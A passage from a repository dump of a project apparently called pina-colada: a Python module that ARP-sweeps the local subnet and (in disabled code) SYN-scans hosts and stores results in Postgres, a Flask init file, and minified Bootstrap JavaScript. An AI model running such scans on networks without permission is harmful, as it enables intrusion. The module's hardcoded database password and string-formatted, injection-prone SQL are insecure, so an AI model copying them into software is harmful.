 50 |         self.subnet = str(self.cidr.network)
 51 |         self.mac = self.core.get_local_mac(self.iface)
 52 |         #self.otherComps = self.arp_all()
 53 |         #self.comps = self.profile()
 54 |         self.conn = self.connect()
 55 |         self.cur = self.conn.cursor() if self.conn else None
 56 | 
 57 | 
 58 |     def arp_all(self):
 59 |         self.otherComps=arping(str(self.subnet) + "/24", verbose=3)
 60 | 
 61 | 
 62 |     #Profiles the networks by arping everything and adds us.
 63 |     def profile(self):
 64 |         comps = []
 65 |         self.arp_all()
 66 |         x, y = self.otherComps
 67 |         for item in x:
 68 |             a, b = item
 69 |             comps.append(Computer(a.pdst, b.src))
 70 |         comps.append(Computer(self.ip, self.mac))
 71 |         self.comps = comps
 72 | 
 73 |     def connect(self):
 74 |         try:
 75 |             return psycopg2.connect("dbname='network' user='aces' host='localhost' password='aces'")
 76 |         except:
 77 |             #logging.log(ERROR, "Could not connect to database")  TODO
 78 |             return None
 79 | 
 80 |     #Just writes all information in this object to the database. No computation done here.
 81 |     def write_db(self):
 82 |         for comp in self.comps:
 83 |             ts = time.time()
 84 |             ports = ""
 85 |             st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
 86 |             self.cur.execute(" \
 87 |                 UPDATE computers SET ip='{0}', ports='{1}', last_online='{2}' WHERE mac='{3}'; \
 88 |                 INSERT INTO computers(ip,mac,ports,last_online) SELECT '{4}', '{5}', '{6}', '{7}' \
 89 |                 WHERE NOT EXISTS (SELECT 1 FROM computers WHERE mac='{8}')" \
 90 |                 .format(comp.ip, ports, st, comp.mac, comp.ip, comp.mac, ports, st, comp.mac))
 91 |         self.conn.commit()
 92 | 
 93 | def begin_scan(thisComp, portLow, portHigh):
 94 |     for comp in thisComp.comps:
 95 |         ports = syn_scan(comp.ip, (portLow, portHigh))
 96 |         ports = ','.join(ports)
 97 |         ts = time.time()
 98 |         st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
 99 |         thisComp.cur.execute(" \
100 |                 UPDATE computers SET ip='{0}', ports='{1}', last_online='{2}' WHERE mac='{3}'; \
101 |                 INSERT INTO computers(ip,mac,ports,last_online) SELECT '{4}', '{5}', '{6}', '{7}' \
102 |                 WHERE NOT EXISTS (SELECT 1 FROM computers WHERE mac='{8}')" \
103 |                 .format(comp.ip, ports, st, comp.mac, comp.ip, comp.mac, ports, st, comp.mac))
104 |     for network in wifi_scan():
105 |         thisComp.cur.execute(" \
106 |                 UPDATE networks SET last_online='{0}' WHERE name='{1}'; \
107 |                 INSERT INTO networks(name, status, last_online) SELECT '{2}', 'online', '{3}' WHERE NOT EXISTS (SELECT 1 FROM networks WHERE name='{4}')" \
108 |                 .format(st, network, network, st, network))
109 |     thisComp.conn.commit()
110 |     thisComp.cur
111 |     return thisComp
112 | 
113 | def init_network(core):
114 |     print "Initializing Network DB..."
115 |     thisComp = Network(core)
116 |     
117 |     try:
118 |         pass#thread.start_new_thread(begin_scan, (thisComp, 22, 22))
119 |     except Exception as e:
120 |         print "Thread creation failed :("
121 |         print e
122 |     
123 | 
124 |     return thisComp
125 | 
126 | 
127 | 
128 | 


--------------------------------------------------------------------------------
/pinacolada_website/__init__.py:
--------------------------------------------------------------------------------
1 | from flask_cors import CORS, cross_origin
2 | from flask import Flask
3 | from pinacolada_website.views import index
4 | 
5 | app = Flask(__name__)
6 | CORS(app)
7 | app.register_blueprint(index.mod)
8 | 


--------------------------------------------------------------------------------
/pinacolada_website/static/background.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ecthros/pina-colada/672ca4e3c01644dd611664ddf7474efa9dc2bc57/pinacolada_website/static/background.gif


--------------------------------------------------------------------------------
/pinacolada_website/static/bootstrap.min.js:
--------------------------------------------------------------------------------
1 | /*!
2 |  * Bootstrap v4.0.0-alpha.5 (https://getbootstrap.com)
3 |  * Copyright 2011-2016 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors)
4 |  * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
5 |  */
6 | if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>=4)throw new Error("Bootstrap's JavaScript requires at least jQuery v1.9.1 but less than v4.0.0")}(jQuery),+function(){function a(a,b){if(!a)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!b||"object"!=typeof b&&"function"!=typeof b?a:b}function b(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(Object.setPrototypeOf?Object.setPrototypeOf(a,b):a.__proto__=b)}function c(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")}var d="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(a){return typeof a}:function(a){return a&&"function"==typeof Symbol&&a.constructor===Symbol&&a!==Symbol.prototype?"symbol":typeof a},e=function(){function a(a,b){for(var c=0;c<b.length;c++){var d=b[c];d.enumerable=d.enumerable||!1,d.configurable=!0,"value"in d&&(d.writable=!0),Object.defineProperty(a,d.key,d)}}return function(b,c,d){return c&&a(b.prototype,c),d&&a(b,d),b}}(),f=function(a){function b(a){return{}.toString.call(a).match(/\s([a-zA-Z]+)/)[1].toLowerCase()}function c(a){return(a[0]||a).nodeType}function d(){return{bindType:h.end,delegateType:h.end,handle:function(b){if(a(b.target).is(this))return b.handleObj.handler.apply(this,arguments)}}}function e(){if(window.QUnit)return!1;var a=document.createElement("bootstrap");for(var b in j)if(void 0!==a.style[b])return{end:j[b]};return!1}function f(b){var c=this,d=!1;return a(this).one(k.TRANSITION_END,function(){d=!0}),setTimeout(function(){d||k.triggerTransitionEnd(c)},b),this}function g(){h=e(),a.fn.emulateTransitionEnd=f,k.supportsTransitionEnd()&&(a.event.special[k.TRANSITION_END]=d())}var h=!1,i=1e6,j={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"},k={TRANSITION_END:"bsTransitionEnd",getUID:function(a){do a+=~~(Math.random()*i);while(document.getElementById(a));return a},getSelectorFromElement:function(a){var b=a.getAttribute("data-target");return b||(b=a.getAttribute("href")||"",b=/^#[a-z]/i.test(b)?b:null),b},reflow:function(a){new Function("bs","return bs")(a.offsetHeight)},triggerTransitionEnd:function(b){a(b).trigger(h.end)},supportsTransitionEnd:function(){return Boolean(h)},typeCheckConfig:function(a,d,e){for(var f in e)if(e.hasOwnProperty(f)){var g=e[f],h=d[f],i=void 0;if(i=h&&c(h)?"element":b(h),!new RegExp(g).test(i))throw new Error(a.toUpperCase()+": "+('Option "'+f+'" provided type "'+i+'" ')+('but expected type "'+g+'".'))}}};return g(),k}(jQuery),g=(function(a){var b="alert",d="4.0.0-alpha.5",g="bs.alert",h="."+g,i=".data-api",j=a.fn[b],k=150,l={DISMISS:'[data-dismiss="alert"]'},m={CLOSE:"close"+h,CLOSED:"closed"+h,CLICK_DATA_API:"click"+h+i},n={ALERT:"alert",FADE:"fade",IN:"in"},o=function(){function b(a){c(this,b),this._element=a}return b.prototype.close=function(a){a=a||this._element;var b=this._getRootElement(a),c=this._triggerCloseEvent(b);c.isDefaultPrevented()||this._removeElement(b)},b.prototype.dispose=function(){a.removeData(this._element,g),this._element=null},b.prototype._getRootElement=function(b){var c=f.getSelectorFromElement(b),d=!1;return c&&(d=a(c)[0]),d||(d=a(b).closest("."+n.ALERT)[0]),d},b.prototype._triggerCloseEvent=function(b){var c=a.Event(m.CLOSE);return a(b).trigger(c),c},b.prototype._removeElement=function(b){return a(b).removeClass(n.IN),f.supportsTransitionEnd()&&a(b).hasClass(n.FADE)?void a(b).one(f.TRANSITION_END,a.proxy(this._destroyElement,this,b)).emulateTransitionEnd(k):void this._destroyElement(b)},b.prototype._destroyElement=function(b){a(b).detach().trigger(m.CLOSED).remove()},b._jQueryInterface=function(c){return this.each(function(){var d=a(this),e=d.data(g);e||(e=new b(this),d.data(g,e)),"close"===c&&e[c](this)})},b._handleDismiss=function(a){return function(b){b&&b.preventDefault(),a.close(this)}},e(b,null,[{key:"VERSION",get:function(){return d}}]),b}();return a(document).on(m.CLICK_DATA_API,l.DISMISS,o._handleDismiss(new o)),a.fn[b]=o._jQueryInterface,a.fn[b].Constructor=o,a.fn[b].noConflict=function(){return a.fn[b]=j,o._jQueryInterface},o}(jQuery),function(a){var b="button",d="4.0.0-alpha.5",f="bs.button",g="."+f,h=".data-api",i=a.fn[b],j={ACTIVE:"active",BUTTON:"btn",FOCUS:"focus"},k={DATA_TOGGLE_CARROT:'[data-toggle^="button"]',DATA_TOGGLE:'[data-toggle="buttons"]',INPUT:"input",ACTIVE:".active",BUTTON:".btn"},l={CLICK_DATA_API:"click"+g+h,FOCUS_BLUR_DATA_API:"focus"+g+h+" "+("blur"+g+h)},m=function(){function b(a){c(this,b),this._element=a}return b.prototype.toggle=function(){var b=!0,c=a(this._element).closest(k.DATA_TOGGLE)[0];if(c){var d=a(this._element).find(k.INPUT)[0];if(d){if("radio"===d.type)if(d.checked&&a(this._element).hasClass(j.ACTIVE))b=!1;else{var e=a(c).find(k.ACTIVE)[0];e&&a(e).removeClass(j.ACTIVE)}b&&(d.checked=!a(this._element).hasClass(j.ACTIVE),a(this._element).trigger("change")),d.focus()}}else this._element.setAttribute("aria-pressed",!a(this._element).hasClass(j.ACTIVE));b&&a(this._element).toggleClass(j.ACTIVE)},b.prototype.dispose=function(){a.removeData(this._element,f),this._element=null},b._jQueryInterface=function(c){return this.each(function(){var d=a(this).data(f);d||(d=new b(this),a(this).data(f,d)),"toggle"===c&&d[c]()})},e(b,null,[{key:"VERSION",get:function(){return d}}]),b}();return a(document).on(l.CLICK_DATA_API,k.DATA_TOGGLE_CARROT,function(b){b.preventDefault();var c=b.target;a(c).hasClass(j.BUTTON)||(c=a(c).closest(k.BUTTON)),m._jQueryInterface.call(a(c),"toggle")}).on(l.FOCUS_BLUR_DATA_API,k.DATA_TOGGLE_CARROT,function(b){var c=a(b.target).closest(k.BUTTON)[0];a(c).toggleClass(j.FOCUS,/^focus(in)?$/.test(b.type))}),a.fn[b]=m._jQueryInterface,a.fn[b].Constructor=m,a.fn[b].noConflict=function(){return a.fn[b]=i,m._jQueryInterface},m}(jQuery),function(a){var b="carousel",g="4.0.0-alpha.5",h="bs.carousel",i="."+h,j=".data-api",k=a.fn[b],l=600,m=37,n=39,o={interval:5e3,keyboard:!0,slide:!1,pause:"hover",wrap:!0},p={interval:"(number|boolean)",keyboard:"boolean",slide:"(boolean|string)",pause:"(string|boolean)",wrap:"boolean"},q={NEXT:"next",PREVIOUS:"prev"},r={SLIDE:"slide"+i,SLID:"slid"+i,KEYDOWN:"keydown"+i,MOUSEENTER:"mouseenter"+i,MOUSELEAVE:"mouseleave"+i,LOAD_DATA_API:"load"+i+j,CLICK_DATA_API:"click"+i+j},s={CAROUSEL:"carousel",ACTIVE:"active",SLIDE:"slide",RIGHT:"right",LEFT:"left",ITEM:"carousel-item"},t={ACTIVE:".active",ACTIVE_ITEM:".active.carousel-item",ITEM:".carousel-item",NEXT_PREV:".next, .prev",INDICATORS:".carousel-indicators",DATA_SLIDE:"[data-slide], [data-slide-to]",DATA_RIDE:'[data-ride="carousel"]'},u=function(){function j(b,d){c(this,j),this._items=null,this._interval=null,this._activeElement=null,this._isPaused=!1,this._isSliding=!1,this._config=this._getConfig(d),this._element=a(b)[0],this._indicatorsElement=a(this._element).find(t.INDICATORS)[0],this._addEventListeners()}return j.prototype.next=function(){this._isSliding||this._slide(q.NEXT)},j.prototype.nextWhenVisible=function(){document.hidden||this.next()},j.prototype.prev=function(){this._isSliding||this._slide(q.PREVIOUS)},j.prototype.pause=function(b){b||(this._isPaused=!0),a(this._element).find(t.NEXT_PREV)[0]&&f.supportsTransitionEnd()&&(f.triggerTransitionEnd(this._element),this.cycle(!0)),clearInterval(this._interval),this._interval=null},j.prototype.cycle=function(b){b||(this._isPaused=!1),this._interval&&(clearInterval(this._interval),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval(a.proxy(document.visibilityState?this.nextWhenVisible:this.next,this),this._config.interval))},j.prototype.to=function(b){var c=this;this._activeElement=a(this._element).find(t.ACTIVE_ITEM)[0];var d=this._getItemIndex(this._activeElement);if(!(b>this._items.length-1||b<0)){if(this._isSliding)return void a(this._element).one(r.SLID,function(){return c.to(b)});if(d===b)return this.pause(),void this.cycle();var e=b>d?q.NEXT:q.PREVIOUS;this._slide(e,this._items[b])}},j.prototype.dispose=function(){a(this._element).off(i),a.removeData(this._element,h),this._items=null,this._config=null,this._element=null,this._interval=null,this._isPaused=null,this._isSliding=null,this._activeElement=null,this._indicatorsElement=null},j.prototype._getConfig=function(c){return c=a.extend({},o,c),f.typeCheckConfig(b,c,p),c},j.prototype._addEventListeners=function(){this._config.keyboard&&a(this._element).on(r.KEYDOWN,a.proxy(this._keydown,this)),"hover"!==this._config.pause||"ontouchstart"in document.documentElement||a(this._element).on(r.MOUSEENTER,a.proxy(this.pause,this)).on(r.MOUSELEAVE,a.proxy(this.cycle,this))},j.prototype._keydown=function(a){if(a.preventDefault(),!/input|textarea/i.test(a.target.tagName))switch(a.which){case m:this.prev();break;case n:this.next();break;default:return}},j.prototype._getItemIndex=function(b){return this._items=a.makeArray(a(b).parent().find(t.ITEM)),this._items.indexOf(b)},j.prototype._getItemByDirection=function(a,b){var c=a===q.NEXT,d=a===q.PREVIOUS,e=this._getItemIndex(b),f=this._items.length-1,g=d&&0===e||c&&e===f;if(g&&!this._config.wrap)return b;var h=a===q.PREVIOUS?-1:1,i=(e+h)%this._items.length;return i===-1?this._items[this._items.length-1]:this._items[i]},j.prototype._triggerSlideEvent=function(b,c){var d=a.Event(r.SLIDE,{relatedTarget:b,direction:c});return a(this._element).trigger(d),d},j.prototype._setActiveIndicatorElement=function(b){if(this._indicatorsElement){a(this._indicatorsElement).find(t.ACTIVE).removeClass(s.ACTIVE);var c=this._indicatorsElement.children[this._getItemIndex(b)];c&&a(c).addClass(s.ACTIVE)}},j.prototype._slide=function(b,c){var d=this,e=a(this._element).find(t.ACTIVE_ITEM)[0],g=c||e&&this._getItemByDirection(b,e),h=Boolean(this._interval),i=b===q.NEXT?s.LEFT:s.RIGHT;if(g&&a(g).hasClass(s.ACTIVE))return void(this._isSliding=!1);var j=this._triggerSlideEvent(g,i);if(!j.isDefaultPrevented()&&e&&g){this._isSliding=!0,h&&this.pause(),this._setActiveIndicatorElement(g);var k=a.Event(r.SLID,{relatedTarget:g,direction:i});f.supportsTransitionEnd()&&a(this._element).hasClass(s.SLIDE)?(a(g).addClass(b),f.reflow(g),a(e).addClass(i),a(g).addClass(i),a(e).one(f.TRANSITION_END,function(){a(g).removeClass(i).removeClass(b),a(g).addClass(s.ACTIVE),a(e).removeClass(s.ACTIVE).removeClass(b).removeClass(i),d._isSliding=!1,setTimeout(function(){return a(d._element).trigger(k)},0)}).emulateTransitionEnd(l)):(a(e).removeClass(s.ACTIVE),a(g).addClass(s.ACTIVE),this._isSliding=!1,a(this._element).trigger(k)),h&&this.cycle()}},j._jQueryInterface=function(b){return this.each(function(){var c=a(this).data(h),e=a.extend({},o,a(this).data());"object"===("undefined"==typeof b?"undefined":d(b))&&a.extend(e,b);var f="string"==typeof b?b:e.slide;if(c||(c=new j(this,e),a(this).data(h,c)),"number"==typeof b)c.to(b);else if("string"==typeof f){if(void 0===c[f])throw new Error('No method named "'+f+'"');c[f]()}else e.interval&&(c.pause(),c.cycle())})},j._dataApiClickHandler=function(b){var c=f.getSelectorFromElement(this);if(c){var d=a(c)[0];if(d&&a(d).hasClass(s.CAROUSEL)){var e=a.extend({},a(d).data(),a(this).data()),g=this.getAttribute("data-slide-to");g&&(e.interval=!1),j._jQueryInterface.call(a(d),e),g&&a(d).data(h).to(g),b.preventDefault()}}},e(j,null,[{key:"VERSION",get:function(){return g}},{key:"Default",get:function(){return o}}]),j}();return a(document).on(r.CLICK_DATA_API,t.DATA_SLIDE,u._dataApiClickHandler),a(window).on(r.LOAD_DATA_API,function(){a(t.DATA_RIDE).each(function(){var b=a(this);u._jQueryInterface.call(b,b.data())})}),a.fn[b]=u._jQueryInterface,a.fn[b].Constructor=u,a.fn[b].noConflict=function(){return a.fn[b]=k,u._jQueryInterface},u}(jQuery),function(a){var b="collapse",g="4.0.0-alpha.5",h="bs.collapse",i="."+h,j=".data-api",k=a.fn[b],l=600,m={toggle:!0,parent:""},n={toggle:"boolean",parent:"string"},o={SHOW:"show"+i,SHOWN:"shown"+i,HIDE:"hide"+i,HIDDEN:"hidden"+i,CLICK_DATA_API:"click"+i+j},p={IN:"in",COLLAPSE:"collapse",COLLAPSING:"collapsing",COLLAPSED:"collapsed"},q={WIDTH:"width",HEIGHT:"height"},r={ACTIVES:".card > .in, .card > .collapsing",DATA_TOGGLE:'[data-toggle="collapse"]'},s=function(){function i(b,d){c(this,i),this._isTransitioning=!1,this._element=b,this._config=this._getConfig(d),this._triggerArray=a.makeArray(a('[data-toggle="collapse"][href="#'+b.id+'"],'+('[data-toggle="collapse"][data-target="#'+b.id+'"]'))),this._parent=this._config.parent?this._getParent():null,this._config.parent||this._addAriaAndCollapsedClass(this._element,this._triggerArray),this._config.toggle&&this.toggle()}return i.prototype.toggle=function(){a(this._element).hasClass(p.IN)?this.hide():this.show()},i.prototype.show=function(){var b=this;if(!this._isTransitioning&&!a(this._element).hasClass(p.IN)){var c=void 0,d=void 0;if(this._parent&&(c=a.makeArray(a(r.ACTIVES)),c.length||(c=null)),!(c&&(d=a(c).data(h),d&&d._isTransitioning))){var e=a.Event(o.SHOW);if(a(this._element).trigger(e),!e.isDefaultPrevented()){c&&(i._jQueryInterface.call(a(c),"hide"),d||a(c).data(h,null));var g=this._getDimension();a(this._element).removeClass(p.COLLAPSE).addClass(p.COLLAPSING),this._element.style[g]=0,this._element.setAttribute("aria-expanded",!0),this._triggerArray.length&&a(this._triggerArray).removeClass(p.COLLAPSED).attr("aria-expanded",!0),this.setTransitioning(!0);var j=function(){a(b._element).removeClass(p.COLLAPSING).addClass(p.COLLAPSE).addClass(p.IN),b._element.style[g]="",b.setTransitioning(!1),a(b._element).trigger(o.SHOWN)};if(!f.supportsTransitionEnd())return void j();var k=g[0].toUpperCase()+g.slice(1),m="scroll"+k;a(this._element).one(f.TRANSITION_END,j).emulateTransitionEnd(l),this._element.style[g]=this._element[m]+"px"}}}},i.prototype.hide=function(){var b=this;if(!this._isTransitioning&&a(this._element).hasClass(p.IN)){var c=a.Event(o.HIDE);if(a(this._element).trigger(c),!c.isDefaultPrevented()){var d=this._getDimension(),e=d===q.WIDTH?"offsetWidth":"offsetHeight";this._element.style[d]=this._element[e]+"px",f.reflow(this._element),a(this._element).addClass(p.COLLAPSING).removeClass(p.COLLAPSE).removeClass(p.IN),this._element.setAttribute("aria-expanded",!1),this._triggerArray.length&&a(this._triggerArray).addClass(p.COLLAPSED).attr("aria-expanded",!1),this.setTransitioning(!0);var g=function(){b.setTransitioning(!1),a(b._element).removeClass(p.COLLAPSING).addClass(p.COLLAPSE).trigger(o.HIDDEN)};return this._element.style[d]="",f.supportsTransitionEnd()?void a(this._element).one(f.TRANSITION_END,g).emulateTransitionEnd(l):void g()}}},i.prototype.setTransitioning=function(a){this._isTransitioning=a},i.prototype.dispose=function(){a.removeData(this._element,h),this._config=null,this._parent=null,this._element=null,this._triggerArray=null,this._isTransitioning=null},i.prototype._getConfig=function(c){return c=a.extend({},m,c),c.toggle=Boolean(c.toggle),f.typeCheckConfig(b,c,n),c},i.prototype._getDimension=function(){var b=a(this._element).hasClass(q.WIDTH);return b?q.WIDTH:q.HEIGHT},i.prototype._getParent=function(){var b=this,c=a(this._config.parent)[0],d='[data-toggle="collapse"][data-parent="'+this._config.parent+'"]';return a(c).find(d).each(function(a,c){b._addAriaAndCollapsedClass(i._getTargetFromElement(c),[c])}),c},i.prototype._addAriaAndCollapsedClass=function(b,c){if(b){var d=a(b).hasClass(p.IN);b.setAttribute("aria-expanded",d),c.length&&a(c).toggleClass(p.COLLAPSED,!d).attr("aria-expanded",d)}},i._getTargetFromElement=function(b){var c=f.getSelectorFromElement(b);return c?a(c)[0]:null},i._jQueryInterface=function(b){return this.each(function(){var c=a(this),e=c.data(h),f=a.extend({},m,c.data(),"object"===("undefined"==typeof b?"undefined":d(b))&&b);if(!e&&f.toggle&&/show|hide/.test(b)&&(f.toggle=!1),e||(e=new i(this,f),c.data(h,e)),"string"==typeof b){if(void 0===e[b])throw new Error('No method named "'+b+'"');e[b]()}})},e(i,null,[{key:"VERSION",get:function(){return g}},{key:"Default",get:function(){return m}}]),i}();return a(document).on(o.CLICK_DATA_API,r.DATA_TOGGLE,function(b){b.preventDefault();var c=s._getTargetFromElement(this),d=a(c).data(h),e=d?"toggle":a(this).data();s._jQueryInterface.call(a(c),e)}),a.fn[b]=s._jQueryInterface,a.fn[b].Constructor=s,a.fn[b].noConflict=function(){return a.fn[b]=k,s._jQueryInterface},s}(jQuery),function(a){var b="dropdown",d="4.0.0-alpha.5",g="bs.dropdown",h="."+g,i=".data-api",j=a.fn[b],k=27,l=38,m=40,n=3,o={HIDE:"hide"+h,HIDDEN:"hidden"+h,SHOW:"show"+h,SHOWN:"shown"+h,CLICK:"click"+h,CLICK_DATA_API:"click"+h+i,KEYDOWN_DATA_API:"keydown"+h+i},p={BACKDROP:"dropdown-backdrop",DISABLED:"disabled",OPEN:"open"},q={BACKDROP:".dropdown-backdrop",DATA_TOGGLE:'[data-toggle="dropdown"]',FORM_CHILD:".dropdown form",ROLE_MENU:'[role="menu"]',ROLE_LISTBOX:'[role="listbox"]',NAVBAR_NAV:".navbar-nav",VISIBLE_ITEMS:'[role="menu"] li:not(.disabled) a, [role="listbox"] li:not(.disabled) a'},r=function(){function b(a){c(this,b),this._element=a,this._addEventListeners()}return b.prototype.toggle=function(){if(this.disabled||a(this).hasClass(p.DISABLED))return!1;var c=b._getParentFromElement(this),d=a(c).hasClass(p.OPEN);if(b._clearMenus(),d)return!1;if("ontouchstart"in document.documentElement&&!a(c).closest(q.NAVBAR_NAV).length){var e=document.createElement("div");e.className=p.BACKDROP,a(e).insertBefore(this),a(e).on("click",b._clearMenus)}var f={relatedTarget:this},g=a.Event(o.SHOW,f);return a(c).trigger(g),!g.isDefaultPrevented()&&(this.focus(),this.setAttribute("aria-expanded","true"),a(c).toggleClass(p.OPEN),a(c).trigger(a.Event(o.SHOWN,f)),!1)},b.prototype.dispose=function(){a.removeData(this._element,g),a(this._element).off(h),this._element=null},b.prototype._addEventListeners=function(){a(this._element).on(o.CLICK,this.toggle)},b._jQueryInterface=function(c){return this.each(function(){var d=a(this).data(g);if(d||a(this).data(g,d=new b(this)),"string"==typeof c){if(void 0===d[c])throw new Error('No method named "'+c+'"');d[c].call(this)}})},b._clearMenus=function(c){if(!c||c.which!==n){var d=a(q.BACKDROP)[0];d&&d.parentNode.removeChild(d);for(var e=a.makeArray(a(q.DATA_TOGGLE)),f=0;f<e.length;f++){var g=b._getParentFromElement(e[f]),h={relatedTarget:e[f]};if(a(g).hasClass(p.OPEN)&&!(c&&"click"===c.type&&/input|textarea/i.test(c.target.tagName)&&a.contains(g,c.target))){var i=a.Event(o.HIDE,h);a(g).trigger(i),i.isDefaultPrevented()||(e[f].setAttribute("aria-expanded","false"),a(g).removeClass(p.OPEN).trigger(a.Event(o.HIDDEN,h)))}}}},b._getParentFromElement=function(b){var c=void 0,d=f.getSelectorFromElement(b);return d&&(c=a(d)[0]),c||b.parentNode},b._dataApiKeydownHandler=function(c){if(/(38|40|27|32)/.test(c.which)&&!/input|textarea/i.test(c.target.tagName)&&(c.preventDefault(),c.stopPropagation(),!this.disabled&&!a(this).hasClass(p.DISABLED))){var d=b._getParentFromElement(this),e=a(d).hasClass(p.OPEN);if(!e&&c.which!==k||e&&c.which===k){if(c.which===k){var f=a(d).find(q.DATA_TOGGLE)[0];a(f).trigger("focus")}return void a(this).trigger("click")}var g=a.makeArray(a(q.VISIBLE_ITEMS));if(g=g.filter(function(a){return a.offsetWidth||a.offsetHeight}),g.length){var h=g.indexOf(c.target);c.which===l&&h>0&&h--,c.which===m&&h<g.length-1&&h++,h<0&&(h=0),g[h].focus()}}},e(b,null,[{key:"VERSION",get:function(){return d}}]),b}();return a(document).on(o.KEYDOWN_DATA_API,q.DATA_TOGGLE,r._dataApiKeydownHandler).on(o.KEYDOWN_DATA_API,q.ROLE_MENU,r._dataApiKeydownHandler).on(o.KEYDOWN_DATA_API,q.ROLE_LISTBOX,r._dataApiKeydownHandler).on(o.CLICK_DATA_API,r._clearMenus).on(o.CLICK_DATA_API,q.DATA_TOGGLE,r.prototype.toggle).on(o.CLICK_DATA_API,q.FORM_CHILD,function(a){a.stopPropagation()}),a.fn[b]=r._jQueryInterface,a.fn[b].Constructor=r,a.fn[b].noConflict=function(){return a.fn[b]=j,r._jQueryInterface},r}(jQuery),function(a){var b="modal",g="4.0.0-alpha.5",h="bs.modal",i="."+h,j=".data-api",k=a.fn[b],l=300,m=150,n=27,o={backdrop:!0,keyboard:!0,focus:!0,show:!0},p={backdrop:"(boolean|string)",keyboard:"boolean",focus:"boolean",show:"boolean"},q={HIDE:"hide"+i,HIDDEN:"hidden"+i,SHOW:"show"+i,SHOWN:"shown"+i,FOCUSIN:"focusin"+i,RESIZE:"resize"+i,CLICK_DISMISS:"click.dismiss"+i,KEYDOWN_DISMISS:"keydown.dismiss"+i,MOUSEUP_DISMISS:"mouseup.dismiss"+i,MOUSEDOWN_DISMISS:"mousedown.dismiss"+i,CLICK_DATA_API:"click"+i+j},r={SCROLLBAR_MEASURER:"modal-scrollbar-measure",BACKDROP:"modal-backdrop",OPEN:"modal-open",FADE:"fade",IN:"in"},s={DIALOG:".modal-dialog",DATA_TOGGLE:'[data-toggle="modal"]',DATA_DISMISS:'[data-dismiss="modal"]',FIXED_CONTENT:".navbar-fixed-top, .navbar-fixed-bottom, .is-fixed"},t=function(){function j(b,d){c(this,j),this._config=this._getConfig(d),this._element=b,this._dialog=a(b).find(s.DIALOG)[0],this._backdrop=null,this._isShown=!1,this._isBodyOverflowing=!1,this._ignoreBackdropClick=!1,this._originalBodyPadding=0,this._scrollbarWidth=0}return j.prototype.toggle=function(a){return this._isShown?this.hide():this.show(a)},j.prototype.show=function(b){var c=this,d=a.Event(q.SHOW,{relatedTarget:b});a(this._element).trigger(d),this._isShown||d.isDefaultPrevented()||(this._isShown=!0,this._checkScrollbar(),this._setScrollbar(),a(document.body).addClass(r.OPEN),this._setEscapeEvent(),this._setResizeEvent(),a(this._element).on(q.CLICK_DISMISS,s.DATA_DISMISS,a.proxy(this.hide,this)),a(this._dialog).on(q.MOUSEDOWN_DISMISS,function(){a(c._element).one(q.MOUSEUP_DISMISS,function(b){a(b.target).is(c._element)&&(c._ignoreBackdropClick=!0)})}),this._showBackdrop(a.proxy(this._showElement,this,b)))},j.prototype.hide=function(b){b&&b.preventDefault();var c=a.Event(q.HIDE);a(this._element).trigger(c),this._isShown&&!c.isDefaultPrevented()&&(this._isShown=!1,this._setEscapeEvent(),this._setResizeEvent(),a(document).off(q.FOCUSIN),a(this._element).removeClass(r.IN),a(this._element).off(q.CLICK_DISMISS),a(this._dialog).off(q.MOUSEDOWN_DISMISS),f.supportsTransitionEnd()&&a(this._element).hasClass(r.FADE)?a(this._element).one(f.TRANSITION_END,a.proxy(this._hideModal,this)).emulateTransitionEnd(l):this._hideModal())},j.prototype.dispose=function(){a.removeData(this._element,h),a(window).off(i),a(document).off(i),a(this._element).off(i),a(this._backdrop).off(i),this._config=null,this._element=null,this._dialog=null,this._backdrop=null,this._isShown=null,this._isBodyOverflowing=null,this._ignoreBackdropClick=null,this._originalBodyPadding=null,this._scrollbarWidth=null},j.prototype._getConfig=function(c){return c=a.extend({},o,c),f.typeCheckConfig(b,c,p),c},j.prototype._showElement=function(b){var c=this,d=f.supportsTransitionEnd()&&a(this._element).hasClass(r.FADE);this._element.parentNode&&this._element.parentNode.nodeType===Node.ELEMENT_NODE||document.body.appendChild(this._element),this._element.style.display="block",this._element.removeAttribute("aria-hidden"),this._element.scrollTop=0,d&&f.reflow(this._element),a(this._element).addClass(r.IN),this._config.focus&&this._enforceFocus();var e=a.Event(q.SHOWN,{relatedTarget:b}),g=function(){c._config.focus&&c._element.focus(),a(c._element).trigger(e)};d?a(this._dialog).one(f.TRANSITION_END,g).emulateTransitionEnd(l):g()},j.prototype._enforceFocus=function(){var b=this;a(document).off(q.FOCUSIN).on(q.FOCUSIN,function(c){document===c.target||b._element===c.target||a(b._element).has(c.target).length||b._element.focus()})},j.prototype._setEscapeEvent=function(){var b=this;this._isShown&&this._config.keyboard?a(this._element).on(q.KEYDOWN_DISMISS,function(a){a.which===n&&b.hide()}):this._isShown||a(this._element).off(q.KEYDOWN_DISMISS)},j.prototype._setResizeEvent=function(){this._isShown?a(window).on(q.RESIZE,a.proxy(this._handleUpdate,this)):a(window).off(q.RESIZE)},j.prototype._hideModal=function(){var b=this;this._element.style.display="none",this._element.setAttribute("aria-hidden","true"),this._showBackdrop(function(){a(document.body).removeClass(r.OPEN),b._resetAdjustments(),b._resetScrollbar(),a(b._element).trigger(q.HIDDEN)})},j.prototype._removeBackdrop=function(){this._backdrop&&(a(this._backdrop).remove(),this._backdrop=null)},j.prototype._showBackdrop=function(b){var c=this,d=a(this._element).hasClass(r.FADE)?r.FADE:"";if(this._isShown&&this._config.backdrop){var 